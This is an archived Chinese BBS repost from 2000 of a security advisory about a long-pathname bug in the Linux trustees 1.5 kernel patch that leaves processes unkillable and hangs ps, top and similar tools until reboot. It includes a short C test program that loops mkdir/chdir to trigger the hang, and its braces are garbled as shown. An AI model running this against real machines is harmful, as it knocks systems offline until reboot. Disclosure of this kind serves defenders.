荔园在线
荔园之美,在春之萌芽,在夏之绽放,在秋之收获,在冬之沉淀
[回到开始]
[上一篇][下一篇]
发信人: bstone (Sealed!), 信区: Hacker
标 题: Linux trustees 1.5 长路径名漏洞
发信站: BBS 荔园晨风站 (Wed Apr 12 09:01:16 2000), 站内信件
发信人: cloudsky (小四), 信区: Security
标 题: Linux trustees 1.5 长路径名漏洞
发信站: 武汉白云黄鹤站 (Tue Apr 11 19:17:27 2000), 站内信件
漏洞名称:
Linux trustees 1.5 长路径名漏洞
发布日期:
2000-4-10
更新日期:
2000-4-10
受影响的系统:
trustees 1.5 for linux 2.2.14
版本号低于 1.6 的 linux trustees
不受影响的系统(如果有的话就写):
高于 1.6 的 linux trustees
描述:
Linux trustees 是一个给Linux 提供类似于Netware支持的内核Patch,缺省
情况
下并没有安装。
在安装了有问题的 Linux trustees 的系统中,当进程访问一个带有长路径的
文件
或目录时,
该进程就会处于一种不能被杀死的状态。
所有其他的进程访问该进程的 /proc 入口时就会出错. 一些系统工具如ps,
w,
top,killall,就
会停止工作。这时就只能通过重新启动系统来解决。
值得注意的是该漏洞不一定限于本地,在远程访问系统时也有可能出现。
测试程序:
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <unistd.h>
int main(void)
{
while(1)
if(mkdir("aaaa",0777)<0)
perror("mkdir");
exit(1);
}
if(chdir("aaaa")<0)
perror("chdir");
exit(1);
}
}
return(0);
}
漏洞发现者以及相关联结:
Andrey E. Lerman (lae@UNIYAR.AC.RU)
解决方案:
在高于 1.6 的 linux trustees 中已经修复。
--
我问飘逝的风:来迟了?
风感慨:是的,他们已经宣战。
我问苏醒的大地:还有希望么?
大地揉了揉眼睛:还有,还有无数代的少年。
我问长空中的英魂:你们相信?
英魂带着笑意离去:相信,希望还在。
※ 来源:.武汉白云黄鹤站 bbs.whnet.edu.cn.[FROM: 203.207.226.124]
--
Live my life!?
※ 来源:·BBS 荔园晨风站 bbs.szu.edu.cn·[FROM: 192.168.28.106]
[回到开始]
[上一篇][下一篇]
荔园在线首页 友情链接:深圳大学 深大招生 荔园晨风BBS S-Term软件 网络书店